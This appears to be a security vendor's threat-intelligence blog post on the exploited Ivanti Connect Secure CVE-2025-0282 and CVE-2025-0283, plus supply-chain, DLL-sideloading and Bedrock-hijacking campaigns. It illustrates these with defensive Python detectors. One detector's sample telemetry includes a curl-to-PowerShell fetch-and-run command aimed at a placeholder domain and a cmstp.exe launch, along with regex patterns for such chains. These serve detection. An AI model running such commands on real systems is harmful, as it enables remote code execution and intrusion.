Ivanti 0-Days in the Wild: Analyzing CVE-2025-0282 and CVE-2025-0283 Amidst a Dynamic Threat Environment

Estimated reading time: 7 minutes

Key Takeaways

  • Ivanti Connect Secure, Ivanti Policy Secure and Ivanti Neurons for ZTA Gateways are affected by two stack-based buffer overflows: CVE-2025-0282, which gives an unauthenticated remote attacker code execution and has been exploited in the wild as a zero-day since mid-December 2024, and CVE-2025-0283, which lets a local authenticated attacker escalate privileges and had no confirmed exploitation at disclosure.
  • The wider threat landscape extends beyond direct product vulnerabilities to supply chain attacks on developer tooling (malicious VS Code extensions, the compromised Ultralytics PyPI releases), abuse of signed security-product binaries for DLL sideloading (Storm-0249 and SentinelOne components), and attacks on cloud-hosted Large Language Models (the JINX-2401 Amazon Bedrock hijacking campaign).
  • Several actors are exploiting the Ivanti flaw: Mandiant ties the SPAWN malware family to the China-nexus cluster UNC5337, while the DRYHOOK credential stealer and the PHASEJAM web shell dropper remain unattributed, suggesting that more than one group may have access to the exploit.
  • Organizations must adopt a multi-layered security approach, emphasizing prompt patch management, rigorous supply chain security, advanced behavioral threat detection, strict Identity and Access Management (IAM), and comprehensive threat intelligence integration.
  • PurpleOps offers a robust cyber threat intelligence platform with real-time ransomware intelligence, dark web monitoring, supply-chain risk monitoring, and breach detection services to help organizations navigate and defend against these complex and evolving threats.

CVE-2025-0282 and CVE-2025-0283: Ivanti 0-Days Under Scrutiny

Ivanti has confirmed active exploitation of CVE-2025-0282 and disclosed CVE-2025-0283 alongside it. Both affect Ivanti Connect Secure, Ivanti Policy Secure and Ivanti Neurons for ZTA Gateways, appliances that sit on the network edge as the entry point for remote access, which is exactly what makes them attractive targets.

CVE-2025-0282

CVE-2025-0282 is an unauthenticated stack-based buffer overflow in Ivanti Connect Secure (ICS), Ivanti Policy Secure and Ivanti Neurons for ZTA Gateways (CVSS 9.0). An attacker who can reach the appliance's web interface sends a crafted request whose oversized input is copied into a fixed-size stack buffer, overwriting adjacent stack data and ultimately hijacking control flow, so arbitrary code runs on the appliance without any credentials. From there the attacker controls the device: malware deployment, credential harvesting, reconnaissance of the internal network and pivoting to downstream systems all follow. Because the exploit depends on the memory layout of a specific build, it is version-specific, which is why attackers fingerprint the appliance version before attempting exploitation.

CVE-2025-0283

CVE-2025-0283 is also a stack-based buffer overflow in the same three products, but with a narrower impact: Ivanti's advisory describes it as allowing a local authenticated attacker to escalate privileges (CVSS 7.0), and Ivanti stated it was not aware of any exploitation of this issue at the time of disclosure. On its own it is a post-compromise problem rather than an entry point, but an attacker who already has a foothold, whether via CVE-2025-0282 or stolen credentials, could use it to gain higher privileges on the appliance, so it should be patched together with CVE-2025-0282 rather than deferred.

Exploitation in the Wild

Mandiant observed exploitation of CVE-2025-0282 as early as mid-December 2024, with attackers using it for unauthenticated remote code execution. The intrusion begins with reconnaissance: the attacker sends requests to specific appliance URLs to determine the exact ICS version, because the exploit must be tailored to the build. These probes typically originate from Virtual Private Server (VPS) providers or Tor exit nodes, which masks the operator's origin. Once the version is known, a crafted request triggers the stack-based buffer overflow and the attacker's code runs on the appliance.

Post-exploitation, the attacker prepares the appliance for malware deployment: SELinux is disabled and the normally read-only filesystem is remounted read-write, after which a dropper injects web shells into legitimate ICS web components such as /home/webserver/htdocs/dana-na/auth/getComponent.cgi and /home/webserver/htdocs/dana-na/auth/restAuth.cgi, giving persistent remote access that blends in with ordinary HTTPS traffic to the appliance. Additional payloads, including Base64-encoded scripts and ELF binaries, are then dropped to extend control, log entries are edited to hide the activity, and SELinux enforcement and the read-only mount are restored afterwards so that a casual inspection shows nothing unusual.

Mandiant attributes deployment of the SPAWN malware family to UNC5337, a China-nexus cluster that Mandiant assesses with moderate confidence to be part of UNC5221, the group behind the January 2024 exploitation of Ivanti appliances. The PHASEJAM dropper and the DRYHOOK credential-theft tool have not been attributed, which suggests that more than one threat actor may have access to the exploit.

Indicators of Compromise (IOCs)

Mandiant has reported the following indicators associated with these intrusions (paths are on the appliance filesystem):

Code family         Filename                                               Description
DRYHOOK             n/a                                                    Credential theft tool
PHASEJAM            /tmp/s                                                 Web shell dropper
PHASEJAM Webshell   /home/webserver/htdocs/dana-na/auth/getComponent.cgi   Web shell (legitimate component, modified in place)
PHASEJAM Webshell   /home/webserver/htdocs/dana-na/auth/restAuth.cgi       Web shell (legitimate component, modified in place)
SPAWNSNAIL          /root/home/lib/libsshd.so                              SSH backdoor
SPAWNMOLE           /root/home/lib/libsocks5.so                            Tunneler
SPAWNANT            /root/lib/libupgrade.so                                Installer
SPAWNSLOTH          /tmp/.liblogblock.so                                   Log tampering utility
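The table above mixes two kinds of indicator: files whose mere presence is suspicious (the dropper and the SPAWN libraries) and legitimate CGI components that are modified in place, where only a comparison against known-good hashes reveals the web shell. The following Python script, added here as an illustration and not part of Mandiant's or Ivanti's tooling, shows that distinction on a constructed directory tree; the appliance paths are the ones from the table, the file contents are placeholders, and the script stands in for the idea behind Ivanti's Integrity Checker Tool rather than replacing it.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Presence alone is an indicator: these paths are created by the dropper and SPAWN family.
DROPPED_FILE_IOCS = [
    "tmp/s",                        # PHASEJAM dropper
    "tmp/.liblogblock.so",          # SPAWNSLOTH
    "root/home/lib/libsshd.so",     # SPAWNSNAIL
    "root/home/lib/libsocks5.so",   # SPAWNMOLE
    "root/lib/libupgrade.so",       # SPAWNANT
]
# Legitimate ICS components that PHASEJAM modifies in place: only a hash mismatch
# against a known-good baseline reveals the injected web shell.
MONITORED_COMPONENTS = [
    "home/webserver/htdocs/dana-na/auth/getComponent.cgi",
    "home/webserver/htdocs/dana-na/auth/restAuth.cgi",
]


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Hash the monitored components on a trusted image (taken before exposure or from
    vendor media), keyed by appliance-relative path."""
    return {rel: sha256_file(root / rel) for rel in MONITORED_COMPONENTS}


def scan(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare a (mounted) appliance filesystem against the baseline and the IOC list."""
    findings: Dict[str, List[str]] = {"modified": [], "missing": [], "ioc_present": []}
    for rel, expected in baseline.items():
        p = root / rel
        if not p.exists():
            findings["missing"].append(rel)
        elif sha256_file(p) != expected:
            findings["modified"].append(rel)
    for rel in DROPPED_FILE_IOCS:
        if (root / rel).exists():
            findings["ioc_present"].append(rel)
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed mini filesystem: baseline it, simulate PHASEJAM plus SPAWNSNAIL, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in MONITORED_COMPONENTS:
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text("#!/usr/bin/perl\n# constructed stand-in for the ICS component\n")
        baseline = build_baseline(root)

        with (root / MONITORED_COMPONENTS[0]).open("a") as f:   # web shell injected in place
            f.write("# constructed stand-in for an injected command handler\n")
        (root / "root/home/lib").mkdir(parents=True)
        (root / "root/home/lib/libsshd.so").write_bytes(b"\x7fELF constructed placeholder")
        return scan(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        for rel in paths:
            print(f"{kind:12} /{rel}")
```

Run it against a forensic image or a mounted copy of the appliance filesystem, never from a shell on the live device: SPAWNSLOTH exists precisely to tamper with what the appliance reports about itself, and Ivanti's guidance is to factory reset a device that fails integrity checks before upgrading.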

Affected Products

The following versions and products are affected. Ivanti Connect Secure 22.7R2.5 contains the fix for both issues; patched builds for Policy Secure and Neurons for ZTA Gateways were scheduled to follow later in January 2025, and Ivanti advised running its Integrity Checker Tool (ICT) and factory resetting any appliance that shows signs of compromise before upgrading.

For CVE-2025-0282:
  • Ivanti Connect Secure: Versions 22.7R2 through 22.7R2.4
  • Ivanti Policy Secure: Versions 22.7R1 through 22.7R1.2
  • Ivanti Neurons for ZTA Gateways: Versions 22.7R2 through 22.7R2.3
For CVE-2025-0283:
  • Ivanti Connect Secure: Versions 22.7R2.4 and prior; Versions 9.1R18.9 and prior
  • Ivanti Policy Secure: Versions 22.7R1.2 and prior
  • Ivanti Neurons for ZTA Gateways: Versions 22.7R2.3 and prior
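Ivanti version strings such as 22.7R2.4 and 9.1R18.9 do not sort correctly as plain strings, and the 9.1 and 22.7 trains must not be compared against each other. The following Python helper, an added example rather than anything Ivanti publishes, encodes the ranges above and answers whether a given product and version falls inside them; the inventory entries at the bottom are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int, int]

# Inclusive (low, high) ranges transcribed from the advisory table above.
# A low of None means "this release and every earlier one in the same major train".
AFFECTED: Dict[str, Dict[str, List[Tuple[Optional[str], str]]]] = {
    "CVE-2025-0282": {
        "Connect Secure": [("22.7R2", "22.7R2.4")],
        "Policy Secure": [("22.7R1", "22.7R1.2")],
        "Neurons for ZTA Gateways": [("22.7R2", "22.7R2.3")],
    },
    "CVE-2025-0283": {
        "Connect Secure": [(None, "22.7R2.4"), (None, "9.1R18.9")],
        "Policy Secure": [(None, "22.7R1.2")],
        "Neurons for ZTA Gateways": [(None, "22.7R2.3")],
    },
}

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)R(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Version:
    """Turn an Ivanti version string ('22.7R2.4', '9.1R18.9', '22.7R2') into a
    comparable tuple. A missing trailing field counts as 0; trailing build info is ignored."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def in_range(v: Version, low: Optional[str], high: str) -> bool:
    """True if v lies inside the inclusive range, never comparing across major trains
    (a 9.1 build is neither 'before' nor 'after' a 22.7 build for patch purposes)."""
    hi = parse_version(high)
    if v[0] != hi[0]:
        return False
    if low is not None and v < parse_version(low):
        return False
    return v <= hi


def assess(product: str, version: str) -> List[str]:
    """Return the CVEs from the table that apply to this product/version pair."""
    v = parse_version(version)
    hits: List[str] = []
    for cve, products in AFFECTED.items():
        if product not in products:
            raise KeyError(f"unknown product {product!r}")
        if any(in_range(v, low, high) for low, high in products[product]):
            hits.append(cve)
    return hits


if __name__ == "__main__":
    # Constructed inventory: (product, version string as shown in the appliance UI).
    inventory = [
        ("Connect Secure", "22.7R2.3"),
        ("Connect Secure", "22.7R2.5"),
        ("Connect Secure", "9.1R18.9"),
        ("Policy Secure", "22.7R1.1"),
        ("Neurons for ZTA Gateways", "22.7R2.4"),
    ]
    for product, version in inventory:
        cves = assess(product, version)
        verdict = "PATCH: " + ", ".join(cves) if cves else "outside the affected ranges"
        print(f"{product:26} {version:10} {verdict}")
```

"Outside the affected ranges" only says the build is not listed; an appliance that ran a vulnerable build while exposed may already be compromised, so pair the version check with an integrity check of the device.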

Risk to Cloud Environments

According to Wiz data, less than 1% of cloud enterprise environments are directly vulnerable to these specific Ivanti vulnerabilities. While this percentage may appear low, the impact on affected organizations can be severe, emphasizing the need for targeted mitigation.

The Evolving Threat Environment: Beyond Direct Exploitation

The exploitation of Ivanti 0-days is one facet of a continually changing threat environment. Organizations must also contend with sophisticated supply chain attacks, the abuse of legitimate security tools, and emerging threats targeting cloud and artificial intelligence infrastructure.

Supply Chain Compromises

Supply chain attacks present a significant challenge by injecting malicious code into trusted software or components.

VS Code Supply Chain Attack

ReversingLabs researchers identified a malware campaign in the Visual Studio Code (VS Code) Marketplace involving 19 malicious extensions, active since February 2025. The campaign evaded standard detection by burying its payloads deep in the extensions' bundled dependency folders rather than in the extension's own code, combining "typosquatting-adjacent" naming with steganography: a file named banner.png looked like an ordinary image but was an archive containing two malicious binaries.

The attack exploited how VS Code extensions bundle dependencies. The attackers modified the widely used path-is-absolute npm package locally inside their extensions, so the official npm registry version remained untouched and a registry-level check would find nothing wrong. On VS Code startup the modified index.js executed a hidden class that decoded a JavaScript dropper from a file named lock; the dropper extracted the payload from the fake PNG and launched the binaries through cmstp.exe, Microsoft's Connection Manager Profile Installer, a signed Living Off the Land binary (LOLBIN) that attackers abuse to run code under a trusted process. One binary emulated key presses; the other was identified as a Rust trojan. Four extensions used a different vector, modifying the @actions/io package and hiding payloads in TypeScript (.ts) and sourcemap (.map) files rather than an image.

The lesson is that a dependency's name and registry version say nothing about the bytes actually shipped inside an extension; supply-chain risk monitoring has to inspect the bundled contents themselves.
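The disguised banner.png works because nothing in the extension pipeline checks that a file's bytes match its extension. The Python script below, added as an example and not ReversingLabs' or any vendor's tooling, walks an unpacked extension tree including node_modules and flags image-named files whose header is actually an archive or executable; the directory contents, including the renamed zip, are constructed for the demo.

```python
import io
import tempfile
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple

# Header bytes a file with these extensions must start with.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Headers that reveal what the file really is when the image check fails.
CONTAINER_MAGIC = {
    b"PK\x03\x04": "zip archive",
    b"\x1f\x8b": "gzip stream",
    b"7z\xbc\xaf\x27\x1c": "7-Zip archive",
    b"Rar!\x1a\x07": "RAR archive",
    b"MZ": "PE executable",
    b"\x7fELF": "ELF executable",
}


def classify(header: bytes, suffix: str) -> Optional[str]:
    """Return a finding when the file's first bytes contradict its image extension,
    or None when the file is either a real image or not claiming to be one."""
    expected = IMAGE_MAGIC.get(suffix.lower())
    if expected is None or header.startswith(expected):
        return None
    for magic, kind in CONTAINER_MAGIC.items():
        if header.startswith(magic):
            return f"{kind} disguised as {suffix}"
    return f"not a valid {suffix} header"


def scan_extension(root: Path) -> List[Tuple[str, str]]:
    """Walk an unpacked extension (node_modules included) and flag every mismatch."""
    findings = []
    for p in root.rglob("*"):
        if p.is_file():
            with p.open("rb") as f:
                verdict = classify(f.read(16), p.suffix)
            if verdict:
                findings.append((p.relative_to(root).as_posix(), verdict))
    return sorted(findings)


def demo() -> List[Tuple[str, str]]:
    """Build a constructed extension tree with one honest PNG and one zip renamed to .png."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        dep = root / "node_modules" / "path-is-absolute"
        dep.mkdir(parents=True)
        (dep / "index.js").write_text("module.exports = p => p.charAt(0) === '/';\n")
        (dep / "logo.png").write_bytes(IMAGE_MAGIC[".png"] + b"\x00" * 32)   # honest image
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr("payload.bin", b"constructed placeholder, not a real binary")
        (dep / "banner.png").write_bytes(buf.getvalue())                     # archive in disguise
        return scan_extension(root)


if __name__ == "__main__":
    for path, verdict in demo():
        print(f"{verdict:30} {path}")
```

A fake PNG is only one disguise; the same campaign hid code in .ts and .map files, which this check will not catch, so treat it as one filter alongside comparing the bundled package bytes against the registry release of the same version.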

Ultralytics AI Library Hacked

A supply chain attack targeted released versions of the Ultralytics Python package, a widely used AI image-prediction (YOLO) library. Compromised versions 8.3.41 and 8.3.42 on PyPI carried code that ran the XMRig cryptocurrency miner. What made the incident notable was the vector: the project's CI/CD workflow rather than a developer's credentials. An actor using the GitHub account openimbot abused GitHub Actions expression injection, crafting pull-request branch names that the vulnerable "Publish Docs" workflow, which ran on every pull request, interpolated directly into a shell step. Because GitHub substitutes ${{ ... }} expressions into the script text before the shell starts, no quoting or sanitisation inside the script could neutralise the content, and the branch name became executable shell. The resulting code execution bundled the miner into the package; the malicious changes were found in v8.3.41/ultralytics/models/yolo/model.py and v8.3.41/ultralytics/utils/downloads.py. Ultralytics is present in 10% of cloud environments, which made the package an attractive target, and the incident shows that CI configuration is part of the software development lifecycle's attack surface. Threat actor tactics and motivation around such campaigns are often shared and discussed in underground forum intelligence.
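The mechanism is GitHub Actions expression injection. The Python linter below, an added example and not the Ultralytics workflow or GitHub's own tooling, scans raw workflow text for attacker-controlled contexts expanded inside run: steps; both workflow snippets are constructed stand-ins for the vulnerable pattern and its fix, not the actual Publish Docs workflow.

```python
import re
from typing import List, Tuple

# Event fields an external pull-request author controls directly. Constructed for this
# example; GitHub's own list of attacker-influenced contexts is longer.
UNTRUSTED_CONTEXTS = [
    r"github\.head_ref",
    r"github\.event\.pull_request\.(?:title|body|head\.ref|head\.label)",
    r"github\.event\.issue\.(?:title|body)",
    r"github\.event\.comment\.body",
    r"github\.event\.commits\[\d+\]\.(?:message|author\.name|author\.email)",
]
_EXPR_RE = re.compile(r"\$\{\{\s*(" + "|".join(UNTRUSTED_CONTEXTS) + r")\s*\}\}")


def find_script_injection(workflow_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, context) for every untrusted expression interpolated into a
    `run:` script. GitHub expands ${{ }} into the script text before the shell starts, so
    quoting inside the script cannot help. Works on raw text; no YAML parser is needed:
    a run block is the `run:` line plus every following line indented deeper than its key."""
    findings = []
    key_col = None                          # column of the `run` key while inside its block
    for n, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        if not stripped:
            continue                        # blank lines do not terminate a block scalar
        indent = len(line) - len(stripped)
        if key_col is not None and indent <= key_col:
            key_col = None                  # dedent: the run block has ended
        if key_col is None:
            list_item = stripped.startswith("- ")
            body = stripped[2:] if list_item else stripped
            if body.startswith("run:"):
                key_col = indent + (2 if list_item else 0)
        if key_col is not None:
            for m in _EXPR_RE.finditer(line):
                findings.append((n, m.group(1)))
    return findings


# Constructed stand-in for the vulnerable pattern: the branch name lands inside the script.
VULNERABLE_WORKFLOW = """\
name: Publish Docs
on: pull_request_target
jobs:
  docs:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build docs for the PR branch
        run: |
          echo "Building ${{ github.head_ref }}"
          mkdocs build
"""

# Same step, hardened: the value arrives through an environment variable, so the shell sees
# a variable reference and the branch name is data, not code.
HARDENED_WORKFLOW = """\
name: Publish Docs
on: pull_request_target
jobs:
  docs:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build docs for the PR branch
        env:
          BRANCH: ${{ github.head_ref }}
        run: |
          echo "Building $BRANCH"
          mkdocs build
"""

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        hits = find_script_injection(text)
        print(f"{label}: {hits or 'no untrusted expressions in run: steps'}")
```

The fix is always the same: move the value into env: so the shell receives a variable reference instead of the attacker's text. The list of untrusted contexts here is deliberately short; extend it with GitHub's documented set (issue titles, commit messages, review bodies and so on) before using it as a CI gate, and remember that the damage is greatest when the trigger, such as pull_request_target, hands the job repository secrets.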

Abuse of Legitimate Security Tools and Infrastructure

Threat actors are increasingly misusing trusted processes and tools to evade detection.

Storm-0249 Abuses EDR Process

The initial access broker (IAB) Storm-0249 has shifted from broad phishing to targeted intrusions that hide behind Endpoint Detection and Response (EDR) processes, specifically abusing SentinelOne components to cloak activity that precedes ransomware deployment. The technique is DLL sideloading. Malicious MSI packages are delivered by phishing, often with "ClickFix" social engineering that tricks the victim into running a command themselves. When the installer runs with SYSTEM privileges it drops a legitimate, digitally signed SentinelAgentWorker.exe (a core SentinelOne component) into a user's AppData folder next to a malicious SentinelAgentCore.dll. When the signed binary launches it resolves the DLL from its own directory and loads the attacker's code, so the malicious activity runs under a trusted, signed EDR process and looks like routine agent behaviour to defenders; signature-based controls see only a legitimate binary, and the attacker's encrypted command-and-control (C2) traffic is disguised as agent telemetry. This is not a vulnerability in SentinelOne itself but abuse of the trust placed in signed binaries, and the same pattern works against any signed executable that loads a DLL by name from its own directory.

Storm-0249 also relies on Living off the Land (LotL) techniques: spoofed Microsoft-looking URLs and curl.exe to fetch scripts that are piped straight into PowerShell, so the payload never touches disk and forensic evidence is minimal. Reconnaissance extracts the host's MachineGuid, a unique system identifier, to accelerate time-to-impact for ransomware affiliates. The end goal is to sell access to ransomware operations such as LockBit and ALPHV. Countering this requires behavioural breach detection (signed binaries running from user-writable paths, curl feeding PowerShell) together with real-time ransomware intelligence and a live ransomware API for rapid incident response.
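Both halves of the chain described above are detectable from endpoint telemetry without any SentinelOne-specific knowledge. The Python rules below, an added example and not vendor detection content, run over constructed Sysmon-style image-load and process-creation events: a signed executable in a user-writable directory loading an unsigned DLL from the same directory, and command lines in which curl.exe feeds PowerShell or cmstp.exe installs an .inf. File paths, the domain and the field names are placeholders.

```python
import re
from typing import Dict, List, Tuple

# Directories a standard user can write to; a signed security-product binary
# has no business running from any of them.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|ProgramData|Public)\\", re.IGNORECASE)

# Command-line shapes from the report above: curl output piped into PowerShell,
# PowerShell pulling or decoding code in memory, and cmstp.exe run with an .inf.
LOLBIN_CHAIN = re.compile(
    r"curl(?:\.exe)?\b.*\|\s*powershell"
    r"|powershell.*?(?:\s-enc\b|\s-e\s|Invoke-Expression|\bIEX\b|DownloadString)"
    r"|cmstp(?:\.exe)?\s+/ni\s+/s\b",
    re.IGNORECASE,
)


def _dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def detect(events: List[Dict]) -> List[Tuple[str, str]]:
    """Run both rules over Sysmon-style events (constructed field names) and
    return (rule, detail) alerts in event order."""
    alerts = []
    for e in events:
        if e["type"] == "image_load":
            exe, dll = e["image"], e["image_loaded"]
            if (e["image_signed"] and not e["dll_signed"]
                    and _dirname(exe) == _dirname(dll)
                    and USER_WRITABLE.search(exe)):
                alerts.append(("dll_sideload",
                               f"signed {exe} loaded unsigned {dll} from a user-writable directory"))
        elif e["type"] == "process_create":
            if LOLBIN_CHAIN.search(e["command_line"]):
                alerts.append(("lolbin_chain", e["command_line"]))
    return alerts


# Constructed sample telemetry. Install paths and the domain are placeholders.
SAMPLE_EVENTS = [
    # Normal: the agent runs from its install directory and loads a signed DLL.
    {"type": "image_load",
     "image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "image_loaded": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentCore.dll",
     "image_signed": True, "dll_signed": True},
    # Sideload: same signed binary copied to AppData, loading an unsigned look-alike DLL.
    {"type": "image_load",
     "image": r"C:\Users\jdoe\AppData\Roaming\Update\SentinelAgentWorker.exe",
     "image_loaded": r"C:\Users\jdoe\AppData\Roaming\Update\SentinelAgentCore.dll",
     "image_signed": True, "dll_signed": False},
    # Fileless fetch: curl output piped straight into PowerShell.
    {"type": "process_create",
     "command_line": r"cmd.exe /c curl.exe -s https://login.microsoft-verify.example/a.ps1 | powershell.exe -"},
    # Benign curl use by an admin script: no pipe into an interpreter.
    {"type": "process_create",
     "command_line": r"C:\Windows\System32\curl.exe -sS https://intranet.example/health -o NUL"},
    # cmstp.exe launched with an attacker .inf from Temp.
    {"type": "process_create",
     "command_line": r"C:\Windows\System32\cmstp.exe /ni /s C:\Users\jdoe\AppData\Local\Temp\p.inf"},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The first rule fires on any signed binary misplaced into a user-writable directory, not only EDR agents, which is the right scope: the technique is generic DLL search-order abuse. Expect tuning for legitimate per-user installers (browsers, chat clients) that ship signed executables with unsigned helper DLLs under AppData.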

Targeting Emerging AI/Cloud Services

The expansion of AI and cloud services introduces new attack surfaces.

LLM Hijacking on AWS (JINX-2401)

Wiz Research identified JINX-2401 attempting to hijack access to LLMs across multiple AWS environments since November 2024. The campaign uses compromised IAM user access keys (long-term AKIA-prefixed credentials) for initial access and then invokes Amazon Bedrock models at the victim's expense. The actor employed a consistent set of privilege escalation and persistence techniques: creating new IAM users, new IAM access keys, and inline policies granting Bedrock permissions. A console login profile was created for the new IAM user, most likely so the actor could complete the model-access agreement step via PutUseCaseForModelAccess. Subsequent attempts to request model access with CreateFoundationModelAgreement were blocked by Service Control Policies (SCPs), which is what stopped the chain. Attack attempts originated from Proton VPN IP addresses. The actor used consistent naming schemes for IAM users (matching ^[A-Z][a-z]{5}[0-9]{3}$) and policies (New_Policy). Invoked models included anthropic.claude-3-sonnet-20240229-v1:0 and anthropic.claude-v2. This type of activity is often coordinated and discussed within dark web monitoring service and telegram threat monitoring channels where threat actors exchange information and tools, and such compromises can lead to brand leak alerting if sensitive data is processed or exfiltrated through the hijacked models.
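The sequence above is visible in CloudTrail as a chain that spans two principals: the compromised key creates the new user, and the new user makes the Bedrock calls. The Python script below, an added example and not Wiz's detection logic, correlates such a chain by charging the activity of a freshly created user back to its creator, and also builds the kind of Service Control Policy that blocked the CreateFoundationModelAgreement calls; the CloudTrail records, account ID, user and role names are constructed and trimmed to the fields used.

```python
import json
import re
from collections import defaultdict
from typing import Dict, List, Tuple

IAM, BEDROCK = "iam.amazonaws.com", "bedrock.amazonaws.com"
NAME_PATTERN = re.compile(r"^[A-Z][a-z]{5}[0-9]{3}$")   # user-naming scheme from the report
PERSISTENCE_CALLS = {"CreateAccessKey", "CreateLoginProfile", "AttachUserPolicy"}
MODEL_ACCESS_CALLS = {"PutUseCaseForModelAccess", "CreateFoundationModelAgreement"}


def analyse(events: List[dict]) -> Dict[str, List[Tuple[str, str]]]:
    """Attribute every indicator to the principal that started the chain: activity by an
    IAM user created inside the window is charged to the principal that created it."""
    created_by: Dict[str, str] = {}
    findings: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for e in sorted(events, key=lambda x: x["eventTime"]):
        ident = e["userIdentity"]
        actor = created_by.get(ident.get("userName"), ident["arn"])
        name, params = e["eventName"], e.get("requestParameters") or {}
        if e["eventSource"] == IAM:
            if name == "CreateUser":
                created_by[params["userName"]] = actor
                if NAME_PATTERN.match(params["userName"]):
                    findings[actor].append(("iam", f"created user {params['userName']} matching naming pattern"))
            elif name in PERSISTENCE_CALLS:
                findings[actor].append(("iam", f"{name} for {params.get('userName')}"))
            elif name == "PutUserPolicy" and "bedrock:" in params.get("policyDocument", ""):
                findings[actor].append(("iam", f"inline policy {params.get('policyName')} grants Bedrock"))
        elif e["eventSource"] == BEDROCK:
            if name in MODEL_ACCESS_CALLS:
                outcome = "denied" if e.get("errorCode") == "AccessDenied" else "succeeded"
                findings[actor].append(("bedrock", f"{name} {outcome}"))
            elif name == "InvokeModel":
                findings[actor].append(("bedrock", f"InvokeModel {params.get('modelId')}"))
    return dict(findings)


def flag(findings: Dict[str, List[Tuple[str, str]]]) -> List[str]:
    """Principals that both manipulated IAM and touched Bedrock in the window."""
    return sorted(arn for arn, items in findings.items()
                  if {cat for cat, _ in items} >= {"iam", "bedrock"})


def bedrock_guardrail_scp(allowed_principal_arns: List[str]) -> dict:
    """Service Control Policy denying all Bedrock actions except for the listed principals.
    Attach it at the OU or account level; an SCP deny cannot be overridden by any identity
    policy inside the account, which is why the actor's agreement calls failed above."""
    return {"Version": "2012-10-17", "Statement": [{
        "Sid": "DenyBedrockExceptApproved", "Effect": "Deny",
        "Action": "bedrock:*", "Resource": "*",
        "Condition": {"StringNotLike": {"aws:PrincipalArn": allowed_principal_arns}},
    }]}


def _ev(t, src, name, arn, params=None, **extra):
    e = {"eventTime": t, "eventSource": src, "eventName": name, "requestParameters": params,
         "userIdentity": {"arn": arn, "userName": arn.rsplit("/", 1)[-1]}}
    e.update(extra)
    return e


ACCT = "arn:aws:iam::123456789012"
STOLEN_KEY_USER = f"{ACCT}:user/ops-backup"        # constructed: owner of the leaked AKIA key
NEW_USER = f"{ACCT}:user/Qwerty123"
BEDROCK_POLICY = json.dumps({"Version": "2012-10-17",
                             "Statement": [{"Effect": "Allow", "Action": "bedrock:*", "Resource": "*"}]})

SAMPLE_EVENTS = [  # constructed CloudTrail records
    _ev("2024-11-20T01:00:00Z", IAM, "CreateUser", STOLEN_KEY_USER, {"userName": "Qwerty123"}),
    _ev("2024-11-20T01:00:05Z", IAM, "CreateAccessKey", STOLEN_KEY_USER, {"userName": "Qwerty123"}),
    _ev("2024-11-20T01:00:09Z", IAM, "PutUserPolicy", STOLEN_KEY_USER,
        {"userName": "Qwerty123", "policyName": "New_Policy", "policyDocument": BEDROCK_POLICY}),
    _ev("2024-11-20T01:00:12Z", IAM, "CreateLoginProfile", STOLEN_KEY_USER, {"userName": "Qwerty123"}),
    _ev("2024-11-20T01:05:00Z", BEDROCK, "PutUseCaseForModelAccess", NEW_USER, {}),
    _ev("2024-11-20T01:05:30Z", BEDROCK, "CreateFoundationModelAgreement", NEW_USER,
        {"modelId": "anthropic.claude-3-sonnet-20240229-v1:0"}, errorCode="AccessDenied"),
    _ev("2024-11-20T01:06:00Z", BEDROCK, "InvokeModel", NEW_USER, {"modelId": "anthropic.claude-v2"}),
    # Legitimate activity that must not be flagged.
    _ev("2024-11-20T02:00:00Z", IAM, "CreateUser", f"{ACCT}:user/admin-jane", {"userName": "ci-deploy-bot"}),
    _ev("2024-11-20T02:10:00Z", BEDROCK, "InvokeModel", f"{ACCT}:role/approved-llm-app",
        {"modelId": "anthropic.claude-v2"}),
]

if __name__ == "__main__":
    found = analyse(SAMPLE_EVENTS)
    for arn in flag(found):
        print(f"ALERT {arn}")
        for cat, detail in found[arn]:
            print(f"  [{cat}] {detail}")
    print(json.dumps(bedrock_guardrail_scp([f"{ACCT}:role/approved-llm-app"]), indent=2))
```

The SCP is a Deny with StringNotLike on aws:PrincipalArn, so it holds even against an IAM user who has just granted themselves bedrock:* inside the account; for assumed roles the condition matches the role ARN, so list the approved application roles rather than individual users.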

Operational Security Measures for Organizations

In response to the current threat landscape, organizations should implement a multi-layered security approach:

